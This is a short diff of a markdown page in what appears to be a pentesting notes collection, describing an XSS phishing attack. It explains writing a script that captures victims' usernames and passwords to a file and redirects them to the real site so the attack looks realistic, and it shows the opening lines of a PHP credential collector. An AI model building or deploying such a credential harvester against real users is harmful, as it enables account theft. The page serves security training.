PentesterArchive/Hacking-Web/XSS Cross-Site Scripting/XSS ATTACKS/XSS Phishing attack.md

 <img src="https://github.com/alejandro-pentest/Hacking-Web/assets/161533623/c2040539-1a58-40c2-97d8-3dafc6a6535f" width="500">

 ## Executing the attack.
-We can create a file to get and write the credentails we obtain into a file.
-We will create a redirection to the original web page in the same file.
+We can create a script to capture and write the credentials we obtain into a file.
+Additionally, we will create a redirection to the original web page within the same script.
+This way, the target will be redirected back to the original website, making our attack even more realistic.

 ```php
 <?php
 if (isset($_GET['username']) && isset($_GET['password'])) {